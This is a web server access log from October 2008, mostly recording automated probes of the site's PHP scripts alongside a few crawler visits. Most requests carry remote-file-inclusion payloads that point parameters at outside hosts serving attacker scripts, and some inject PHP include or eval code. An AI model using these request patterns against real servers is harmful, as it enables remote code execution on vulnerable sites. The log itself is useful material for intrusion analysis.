203.194.205.6 - - [11/Oct/2008:05:46:05 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:46:11 -0700] "GET /logs//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:46:35 -0700] "GET /logs/access_080923.log%20///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:46:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:05:47:04 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:05:47:04 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:47:39 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jooty.com"
72.52.255.82 - - [11/Oct/2008:05:47:39 -0700] "GET /?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "jooty.com"
83.168.226.126 - - [11/Oct/2008:05:47:43 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:05:47:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:47:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.810" "jooty.com"
121.170.11.100 - - [11/Oct/2008:05:48:06 -0700] "GET /logs/access_080920.log/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
89.111.176.32 - - [11/Oct/2008:05:48:08 -0700] "GET /logs/access_080824.log//index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:09 -0700] "GET /logs/access_080924.log//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.810" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:14 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:14 -0700] "GET /?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:14 -0700] "GET /?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:22 -0700] "GET /logs//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.810" "jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:43 -0700] "GET /logs/access_080924.log//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:43 -0700] "GET /logs//?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.810" "www.jooty.com"
72.52.255.82 - - [11/Oct/2008:05:48:48 -0700] "GET /?path%5Bdocroot%5D=http://oakmgmt.net/dotproject/includes/Insiderz/racrew.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.jooty.com"
212.241.179.137 - - [11/Oct/2008:05:49:39 -0700] "GET /logs/access_080919.log/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
83.64.132.254 - - [11/Oct/2008:05:50:50 -0700] "GET /logs/access_080919.log/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:05:51:47 -0700] "GET /mwchat/libs/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:05:51:48 -0700] "GET /mwchat/libs/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.68.226.130 - - [11/Oct/2008:05:52:03 -0700] "GET /logs/access.log/?sourcedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jooty.com"
195.68.226.130 - - [11/Oct/2008:05:52:04 -0700] "GET /?sourcedir=http://www.trosken.com/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:52:05 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.68.226.130 - - [11/Oct/2008:05:52:05 -0700] "GET /logs/?sourcedir=http://www.trosken.com/id.txt? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "www.jooty.com"
216.246.20.140 - - [11/Oct/2008:05:52:06 -0700] "GET /phphtml.php?htmlclass_path=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:52:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:52:19 -0700] "GET /logs/access_080926.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:52:19 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:52:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:52:48 -0700] "GET /logs/access_080923.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:52:49 -0700] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:52:49 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:52:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
81.220.43.28 - - [11/Oct/2008:05:54:00 -0700] "GET /logs/access_080920.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
81.220.43.28 - - [11/Oct/2008:05:54:01 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
81.220.43.28 - - [11/Oct/2008:05:54:01 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:05:55:23 -0700] "GET /logs/access_080919.log/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:55:40 -0700] "GET /logs/access_080919.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
216.246.20.140 - - [11/Oct/2008:05:55:42 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jooty.com"
216.246.20.140 - - [11/Oct/2008:05:55:42 -0700] "GET /phphtml.php?htmlclass_path=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jooty.com"
216.246.20.140 - - [11/Oct/2008:05:55:42 -0700] "GET /logs/phphtml.php?htmlclass_path=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:56:56 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:56:57 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:56:57 -0700] "GET /mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:56:57 -0700] "GET /mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:56:57 -0700] "GET /logs//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:56:58 -0700] "GET /logs//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
216.246.20.140 - - [11/Oct/2008:05:57:56 -0700] "GET /logs/access_080920.log/phphtml.php?htmlclass_path=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jooty.com"
81.220.43.28 - - [11/Oct/2008:05:59:14 -0700] "GET /logs/access_080924.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
74.6.17.183 - - [11/Oct/2008:06:00:07 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:03:48 -0700] "GET /logs/access_080919.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.68.226.130 - - [11/Oct/2008:06:04:47 -0700] "GET /logs/access.log//?page=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jooty.com"
195.68.226.130 - - [11/Oct/2008:06:04:48 -0700] "GET /?page=http://www.trosken.com/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.jooty.com"
195.68.226.130 - - [11/Oct/2008:06:04:48 -0700] "GET /logs//?page=http://www.trosken.com/id.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.810" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:05:01 -0700] "GET /logs/access_080914.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:05:01 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
65.55.208.60 - - [11/Oct/2008:06:05:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.60 - - [11/Oct/2008:06:05:39 -0700] "GET /logs/access_081006.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.60 - - [11/Oct/2008:06:05:39 -0700] "GET /logs/?N=D HTTP/1.1" 200 4942 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.60 - - [11/Oct/2008:06:05:39 -0700] "GET /logs/access_080923.log HTTP/1.1" 200 1179648 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.60 - - [11/Oct/2008:06:05:40 -0700] "GET /logs/access_080919.log HTTP/1.1" 200 1048576 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:06:07:59 -0700] "GET /logs/access_080816.log//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
84.19.184.14 - - [11/Oct/2008:06:08:25 -0700] "GET /?sourcedir=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:08:43 -0700] "GET /logs/access.log//modules/My_eGallery/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:08:43 -0700] "GET /logs/access.log//modules/My_eGallery/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:08:44 -0700] "GET /modules/My_eGallery/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:08:44 -0700] "GET /modules/My_eGallery/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:08:44 -0700] "GET /logs//modules/My_eGallery/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:08:44 -0700] "GET /logs//modules/My_eGallery/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:11:07 -0700] "GET /logs/access_080914.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:11:08 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:11:18 -0700] "GET /logs/access_080919.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:12:06 -0700] "GET /logs/scripts.log//modules/My_eGallery/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:12:06 -0700] "GET /logs/scripts.log//modules/My_eGallery/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:14:25 -0700] "GET /logs/access.log/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:14:26 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:14:26 -0700] "GET /logs/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:06:14:53 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:06:14:53 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:06:14:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
83.168.226.126 - - [11/Oct/2008:06:14:58 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:15:56 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:15:57 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:15:57 -0700] "GET /mwchat/libs/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:15:58 -0700] "GET /mwchat/libs/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:15:59 -0700] "GET /logs//mwchat/libs/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:15:59 -0700] "GET /logs//mwchat/libs/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:06:16:04 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:06:16:04 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:06:16:04 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:06:16:17 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:06:16:17 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:06:16:17 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:06:16:25 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:06:16:25 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:06:16:25 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:06:17:31 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:17:59 -0700] "GET /logs/access_080919.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:06:18:20 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:06:18:31 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:06:18:38 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:06:18:38 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:06:18:38 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:06:19:38 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:21:05 -0700] "GET /logs/access_080926.log//mwchat/libs/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:21:06 -0700] "GET /logs/access_080926.log//mwchat/libs/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
91.205.124.12 - - [11/Oct/2008:06:21:35 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:21:58 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:21:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:21:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:21:59 -0700] "GET /logs/access.log/include/admin.lib.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:21:59 -0700] "GET /logs/include/admin.lib.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:21:59 -0700] "GET /include/admin.lib.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:21:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
